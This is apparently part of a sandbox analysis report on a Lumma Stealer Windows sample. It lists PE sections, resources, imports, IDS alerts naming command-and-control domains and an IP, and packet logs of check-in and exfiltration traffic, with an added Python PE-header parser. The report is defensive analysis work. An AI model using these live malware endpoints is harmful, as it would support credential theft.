_RDATA | 0x70000 | 0x15c | 0x200 | b999e3f72a9a42ebb4d9b8fafa0a18e7 | False | 0.40625 | data | 3.3314534700182197 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x71000 | 0x1f964 | 0x1fa00 | e91f632c67ce39b29c85915cd0a6bd9f | False | 0.23395040760869565 | data | 4.816361806689922 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x91000 | 0x938 | 0xa00 | c057cd0b29d094da3cebf433be170d6d | False | 0.498828125 | data | 5.228587706357198 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
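The static fields above (entrypoint, image base, link timestamp, DllCharacteristics, the section table with its entropy column, and the "Is in Section" column of the data directory table) are all derived directly from the PE headers. As an added example, not code from the Joe Sandbox report or from the sample, the following standard-library Python walks a PE32+ image and reproduces those fields. It parses a constructed two-section test image built inline by build_sample_pe (not the sample's bytes); that image's ImageBase, TimeDateStamp and DllCharacteristics are set to the values shown in the report, and its .text is filled with uniform bytes and its .rdata with zeros so the two entropy extremes are visible.

```python
"""Header walker for PE32+ images: reproduces the static fields a sandbox report
lists (entrypoint, image base, link timestamp, DllCharacteristics, per-section
entropy and which section each data directory lands in). Standard library only."""
import datetime
import math
import struct

DLL_CHARACTERISTICS = {  # IMAGE_DLLCHARACTERISTICS_* bits from winnt.h
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH", 0x0800: "NO_BIND",
    0x1000: "APPCONTAINER", 0x2000: "WDM_DRIVER", 0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE",
}
SECTION_FLAGS = {  # IMAGE_SCN_* bits behind the report's Characteristics column (prefix dropped)
    0x00000020: "CNT_CODE", 0x00000040: "CNT_INITIALIZED_DATA", 0x00000080: "CNT_UNINITIALIZED_DATA",
    0x02000000: "MEM_DISCARDABLE", 0x20000000: "MEM_EXECUTE", 0x40000000: "MEM_READ", 0x80000000: "MEM_WRITE",
}
DIRECTORY_NAMES = ["EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC", "DEBUG",
                   "COPYRIGHT", "GLOBALPTR", "TLS", "LOAD_CONFIG", "BOUND_IMPORT", "IAT",
                   "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED"]


def shannon_entropy(blob: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniform; packed or encrypted sections sit near 8."""
    if not blob:
        return 0.0
    counts = [0] * 256
    for b in blob:
        counts[b] += 1
    return -sum(c / len(blob) * math.log2(c / len(blob)) for c in counts if c)


def section_for_rva(sections, rva):
    """Name of the section whose virtual range covers rva, else None."""
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return s["name"]
    return None


def parse_pe(data: bytes) -> dict:
    """DOS header -> PE signature -> COFF header -> PE32+ optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    pe = struct.unpack_from("<I", data, 0x3C)[0]            # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, nsec, tstamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe + 4)
    opt = pe + 24                                            # signature (4) + COFF header (20)
    if struct.unpack_from("<H", data, opt)[0] != 0x20B:
        raise ValueError("only PE32+ (64-bit) images are handled here")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    os_major, os_minor = struct.unpack_from("<HH", data, opt + 40)
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    ndirs = min(struct.unpack_from("<I", data, opt + 108)[0], 16)
    dirs = [struct.unpack_from("<II", data, opt + 112 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"), "va": va,
                         "vsize": vsize, "rawsize": rawsize,
                         "entropy": shannon_entropy(data[rawptr:rawptr + rawsize]),
                         "flags": [n for bit, n in SECTION_FLAGS.items() if flags & bit]})
    return {
        "machine": machine,
        "timestamp": datetime.datetime.fromtimestamp(tstamp, datetime.timezone.utc),
        "image_base": image_base,
        "entrypoint": image_base + entry_rva,
        "entry_section": section_for_rva(sections, entry_rva),
        "subsystem": subsystem, "os_version": (os_major, os_minor),
        "dll_characteristics": [n for bit, n in DLL_CHARACTERISTICS.items() if dll_chars & bit],
        "sections": sections,
        "directories": [(DIRECTORY_NAMES[i], rva, size, section_for_rva(sections, rva) if size else None)
                        for i, (rva, size) in enumerate(dirs)],
    }


def build_sample_pe() -> bytes:
    """Constructed two-section PE32+ test image (NOT the analysed sample's bytes). Header values
    mirror the report: ImageBase 0x140000000, TimeDateStamp 0x6640972B, DllCharacteristics 0xC160."""
    text, rdata = bytes(range(256)) * 2, b"\0" * 0x200       # uniform bytes vs. constant bytes
    layout = [(b".text", 0x1000, text, 0x60000020), (b".rdata", 0x2000, rdata, 0x40000040)]
    raw_ptr, sec_hdrs, blobs = 0x200, b"", b""
    for name, va, blob, flags in layout:
        padded = blob + b"\0" * (-len(blob) % 0x200)        # FileAlignment 0x200
        sec_hdrs += struct.pack("<8sIIIIIIHHI", name, len(blob), va, len(padded), raw_ptr, 0, 0, 0, 0, flags)
        raw_ptr, blobs = raw_ptr + len(padded), blobs + padded
    dirs = [(0, 0)] * 16
    dirs[1], dirs[12] = (0x2040, 0x50), (0x2000, 0x40)      # IMPORT and IAT placed inside .rdata
    opt = struct.pack("<HBBIIIIIQIIHHHHHHIIIIHHQQQQII", 0x20B, 14, 0, len(text), len(rdata), 0,
                      0x1010, 0x1000, 0x140000000, 0x1000, 0x200, 5, 2, 0, 0, 5, 2, 0, 0x3000, 0x200, 0,
                      2, 0xC160, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", *d) for d in dirs)
    coff = struct.pack("<HHIIIHH", 0x8664, len(layout), 0x6640972B, 0, 0, len(opt), 0x0022)
    headers = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40) + b"PE\0\0" + coff + opt + sec_hdrs
    return headers + b"\0" * (0x200 - len(headers)) + blobs


if __name__ == "__main__":
    info = parse_pe(build_sample_pe())
    print(f"Entrypoint: {info['entrypoint']:#x} ({info['entry_section']})  "
          f"Time Stamp: {info['timestamp']:%Y-%m-%d %H:%M:%S} UTC")
    print("DLL Characteristics:", ", ".join(info["dll_characteristics"]))
    for s in info["sections"]:
        print(f"{s['name']:<8} VA {s['va']:#07x} VSize {s['vsize']:#x} Entropy {s['entropy']:.3f} {', '.join(s['flags'])}")
    for name, rva, size, sec in info["directories"]:
        print(f"{name:<15} {rva:#x} {size:#x} {sec or ''}")
```

Reading the report's numbers with this in mind: a .text entropy of about 6.5 is what ordinary compiled x64 code produces, whereas a packed or encrypted code section would sit close to 8.0, so the entropy column alone does not flag this sample as packed even though the behavioural signatures show string decryption at run time; the ZLIB complexity of 1.0 on the PNG resources simply reflects already-compressed data. Run on a real file, read it with open(path, "rb").read() and pass the bytes to parse_pe.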
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x71644 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
PNG | 0x7218c | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
RT_ICON | 0x73738 | 0x2655 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9913380209925609
RT_ICON | 0x75d90 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/m | | | 0.0588844197326393
RT_ICON | 0x865b8 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/m | | | 0.1115375531412376
RT_ICON | 0x8a7e0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m | | | 0.15020746887966804
RT_ICON | 0x8cd88 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m | | | 0.2223264540337711
RT_ICON | 0x8de30 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m | | | 0.45478723404255317
RT_DIALOG | 0x8e298 | 0x286 | data | English | United States | 0.5092879256965944
RT_DIALOG | 0x8e520 | 0x13a | data | English | United States | 0.60828025477707
RT_DIALOG | 0x8e65c | 0xec | data | English | United States | 0.6991525423728814
RT_DIALOG | 0x8e748 | 0x12e | data | English | United States | 0.5927152317880795
RT_DIALOG | 0x8e878 | 0x338 | data | English | United States | 0.45145631067961167
RT_DIALOG | 0x8ebb0 | 0x252 | data | English | United States | 0.5757575757575758
RT_STRING | 0x8ee04 | 0x1e2 | data | English | United States | 0.3900414937759336
RT_STRING | 0x8efe8 | 0x1cc | data | English | United States | 0.4282608695652174
RT_STRING | 0x8f1b4 | 0x1b8 | data | English | United States | 0.45681818181818185
RT_STRING | 0x8f36c | 0x146 | data | English | United States | 0.5153374233128835
RT_STRING | 0x8f4b4 | 0x46c | data | English | United States | 0.3454063604240283
RT_STRING | 0x8f920 | 0x166 | data | English | United States | 0.49162011173184356
RT_STRING | 0x8fa88 | 0x152 | data | English | United States | 0.5059171597633136
RT_STRING | 0x8fbdc | 0x10a | data | English | United States | 0.49624060150375937
RT_STRING | 0x8fce8 | 0xbc | data | English | United States | 0.6329787234042553
RT_STRING | 0x8fda4 | 0x1c0 | data | English | United States | 0.5178571428571429
RT_STRING | 0x8ff64 | 0x250 | data | English | United States | 0.44256756756756754
                                                                                                                                                                        RT_GROUP_ICON0x901b40x5adata0.7666666666666667
                                                                                                                                                                        RT_MANIFEST0x902100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333
DLL | Import
KERNEL32.dll | LocalFree, GetLastError, SetLastError, FormatMessageW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileTime, CloseHandle, CreateFileW, GetCurrentProcessId, CreateDirectoryW, RemoveDirectoryW, SetFileAttributesW, GetFileAttributesW, DeleteFileW, MoveFileW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetCurrentProcess, GetExitCodeProcess, WaitForSingleObject, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapReAlloc, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, SetEvent, ResetEvent, WaitForSingleObjectEx, CreateEventW, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipCloneImage, GdipAlloc, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-31T01:05:20.635488+0100 | 2056752 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deepymouthi .sbs) | 1 | 192.168.2.4 | 63735 | 1.1.1.1 | 53 | UDP
2024-10-31T01:05:20.647197+0100 | 2056760 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (monstourtu .sbs) | 1 | 192.168.2.4 | 59066 | 1.1.1.1 | 53 | UDP
2024-10-31T01:05:20.659161+0100 | 2056756 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (heroicmint .sbs) | 1 | 192.168.2.4 | 52412 | 1.1.1.1 | 53 | UDP
2024-10-31T01:05:20.670626+0100 | 2056762 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sidercotay .sbs) | 1 | 192.168.2.4 | 62213 | 1.1.1.1 | 53 | UDP
2024-10-31T01:05:20.681200+0100 | 2056750 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (captaitwik .sbs) | 1 | 192.168.2.4 | 58904 | 1.1.1.1 | 53 | UDP
2024-10-31T01:05:20.691871+0100 | 2056766 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrigglesight .sbs) | 1 | 192.168.2.4 | 57319 | 1.1.1.1 | 53 | UDP
2024-10-31T01:05:20.704815+0100 | 2056754 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ferrycheatyk .sbs) | 1 | 192.168.2.4 | 60925 | 1.1.1.1 | 53 | UDP
2024-10-31T01:05:20.715001+0100 | 2056764 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (snailyeductyi .sbs) | 1 | 192.168.2.4 | 49626 | 1.1.1.1 | 53 | UDP
2024-10-31T01:05:22.218518+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.4 | 49734 | 104.102.49.254 | 443 | TCP
2024-10-31T01:05:23.695491+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49736 | 104.21.32.196 | 443 | TCP
2024-10-31T01:05:23.695491+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49736 | 104.21.32.196 | 443 | TCP
2024-10-31T01:05:24.818599+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49738 | 104.21.32.196 | 443 | TCP
2024-10-31T01:05:24.818599+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49738 | 104.21.32.196 | 443 | TCP
2024-10-31T01:05:33.735583+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49743 | 104.21.32.196 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 31, 2024 01:05:20.739274025 CET | 49734 | 443 | 192.168.2.4 | 104.102.49.254
Oct 31, 2024 01:05:20.739316940 CET | 443 | 49734 | 104.102.49.254 | 192.168.2.4
Oct 31, 2024 01:05:20.739388943 CET | 49734 | 443 | 192.168.2.4 | 104.102.49.254
Oct 31, 2024 01:05:20.742279053 CET | 49734 | 443 | 192.168.2.4 | 104.102.49.254
Oct 31, 2024 01:05:20.742289066 CET | 443 | 49734 | 104.102.49.254 | 192.168.2.4
Oct 31, 2024 01:05:21.581840038 CET | 443 | 49734 | 104.102.49.254 | 192.168.2.4
Oct 31, 2024 01:05:21.581938982 CET | 49734 | 443 | 192.168.2.4 | 104.102.49.254
Oct 31, 2024 01:05:21.584791899 CET | 49734 | 443 | 192.168.2.4 | 104.102.49.254
Oct 31, 2024 01:05:21.584803104 CET | 443 | 49734 | 104.102.49.254 | 192.168.2.4
Oct 31, 2024 01:05:21.585212946 CET | 443 | 49734 | 104.102.49.254 | 192.168.2.4
Oct 31, 2024 01:05:21.637260914 CET | 49734 | 443 | 192.168.2.4 | 104.102.49.254
Oct 31, 2024 01:05:21.683339119 CET | 443 | 49734 | 104.102.49.254 | 192.168.2.4
Oct 31, 2024 01:05:22.218590021 CET | 443 | 49734 | 104.102.49.254 | 192.168.2.4
Oct 31, 2024 01:05:22.218615055 CET | 443 | 49734 | 104.102.49.254 | 192.168.2.4
Oct 31, 2024 01:05:22.218624115 CET | 443 | 49734 | 104.102.49.254 | 192.168.2.4
Oct 31, 2024 01:05:22.218641043 CET | 443 | 49734 | 104.102.49.254 | 192.168.2.4
Oct 31, 2024 01:05:22.218650103 CET | 443 | 49734 | 104.102.49.254 | 192.168.2.4
Oct 31, 2024 01:05:22.218693972 CET | 49734 | 443 | 192.168.2.4 | 104.102.49.254
Oct 31, 2024 01:05:22.218714952 CET | 443 | 49734 | 104.102.49.254 | 192.168.2.4
Oct 31, 2024 01:05:22.218739986 CET | 49734 | 443 | 192.168.2.4 | 104.102.49.254
Oct 31, 2024 01:05:22.218775988 CET | 49734 | 443 | 192.168.2.4 | 104.102.49.254
Oct 31, 2024 01:05:22.234962940 CET | 443 | 49734 | 104.102.49.254 | 192.168.2.4
Oct 31, 2024 01:05:22.235033989 CET | 443 | 49734 | 104.102.49.254 | 192.168.2.4
Oct 31, 2024 01:05:22.235085964 CET | 49734 | 443 | 192.168.2.4 | 104.102.49.254
Oct 31, 2024 01:05:22.235100031 CET | 443 | 49734 | 104.102.49.254 | 192.168.2.4
Oct 31, 2024 01:05:22.235119104 CET | 49734 | 443 | 192.168.2.4 | 104.102.49.254
Oct 31, 2024 01:05:22.235145092 CET | 49734 | 443 | 192.168.2.4 | 104.102.49.254
Oct 31, 2024 01:05:22.243952990 CET | 443 | 49734 | 104.102.49.254 | 192.168.2.4
Oct 31, 2024 01:05:22.244013071 CET | 49734 | 443 | 192.168.2.4 | 104.102.49.254
Oct 31, 2024 01:05:22.250996113 CET | 443 | 49734 | 104.102.49.254 | 192.168.2.4
Oct 31, 2024 01:05:22.251065016 CET | 49734 | 443 | 192.168.2.4 | 104.102.49.254
Oct 31, 2024 01:05:22.251069069 CET | 443 | 49734 | 104.102.49.254 | 192.168.2.4
Oct 31, 2024 01:05:22.251110077 CET | 443 | 49734 | 104.102.49.254 | 192.168.2.4
Oct 31, 2024 01:05:22.253298044 CET | 49734 | 443 | 192.168.2.4 | 104.102.49.254
Oct 31, 2024 01:05:22.267105103 CET | 49734 | 443 | 192.168.2.4 | 104.102.49.254
Oct 31, 2024 01:05:22.267129898 CET | 443 | 49734 | 104.102.49.254 | 192.168.2.4
Oct 31, 2024 01:05:22.557188034 CET | 49736 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:22.557224035 CET | 443 | 49736 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:22.557295084 CET | 49736 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:22.557580948 CET | 49736 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:22.557593107 CET | 443 | 49736 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:23.198942900 CET | 443 | 49736 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:23.199018002 CET | 49736 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:23.202739000 CET | 49736 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:23.202749014 CET | 443 | 49736 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:23.202950954 CET | 443 | 49736 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:23.212043047 CET | 49736 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:23.212057114 CET | 49736 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:23.212100983 CET | 443 | 49736 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:23.695482969 CET | 443 | 49736 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:23.695557117 CET | 443 | 49736 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:23.695750952 CET | 49736 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:23.695842981 CET | 49736 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:23.695853949 CET | 443 | 49736 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:23.695880890 CET | 49736 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:23.695887089 CET | 443 | 49736 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:23.754514933 CET | 49738 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:23.754534960 CET | 443 | 49738 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:23.754615068 CET | 49738 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:23.754882097 CET | 49738 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:23.754892111 CET | 443 | 49738 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:24.373007059 CET | 443 | 49738 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:24.373090982 CET | 49738 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:24.374651909 CET | 49738 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:24.374661922 CET | 443 | 49738 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:24.374906063 CET | 443 | 49738 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:24.384278059 CET | 49738 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:24.384303093 CET | 49738 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:24.384372950 CET | 443 | 49738 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:24.818615913 CET | 443 | 49738 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:24.818664074 CET | 443 | 49738 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:24.818707943 CET | 443 | 49738 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:24.818737030 CET | 443 | 49738 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:24.818764925 CET | 49738 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:24.818770885 CET | 443 | 49738 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:24.818780899 CET | 443 | 49738 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:24.818799973 CET | 49738 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:24.818818092 CET | 49738 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:24.818826914 CET | 443 | 49738 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:24.818861008 CET | 443 | 49738 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:24.819174051 CET | 49738 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:24.819180012 CET | 443 | 49738 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:24.823539019 CET | 443 | 49738 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:24.827194929 CET | 49738 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:24.827208996 CET | 443 | 49738 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:24.876058102 CET | 49738 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:24.937252045 CET | 443 | 49738 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:24.937314987 CET | 443 | 49738 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:24.937366962 CET | 49738 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:24.937376976 CET | 443 | 49738 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:24.937434912 CET | 443 | 49738 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:24.937475920 CET | 49738 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:24.978060007 CET | 49738 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:24.978075027 CET | 443 | 49738 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:25.328232050 CET | 49739 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:25.328272104 CET | 443 | 49739 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:25.328356981 CET | 49739 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:25.328758955 CET | 49739 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:25.328771114 CET | 443 | 49739 | 104.21.32.196 | 192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:25.929438114 CET44349739104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:25.929585934 CET49739443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:25.931088924 CET49739443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:25.931097984 CET44349739104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:25.931299925 CET44349739104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:25.933322906 CET49739443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:25.933512926 CET49739443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:25.933546066 CET44349739104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:25.933619976 CET49739443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:25.933626890 CET44349739104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:26.511029005 CET44349739104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:26.511121035 CET44349739104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:26.511179924 CET49739443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:26.511323929 CET49739443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:26.511339903 CET44349739104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:26.594139099 CET49740443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:26.594232082 CET44349740104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:26.594321012 CET49740443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:26.594605923 CET49740443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:26.594641924 CET44349740104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:27.241219997 CET44349740104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:27.241444111 CET49740443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:27.242652893 CET49740443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:27.242697001 CET44349740104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:27.242925882 CET44349740104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:27.244626045 CET49740443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:27.244755030 CET49740443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:27.244796991 CET44349740104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:27.946172953 CET44349740104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:27.946269989 CET44349740104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:27.946348906 CET49740443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:27.946692944 CET49740443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:27.946738958 CET44349740104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:28.150660038 CET49741443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:28.150697947 CET44349741104.21.32.196192.168.2.4
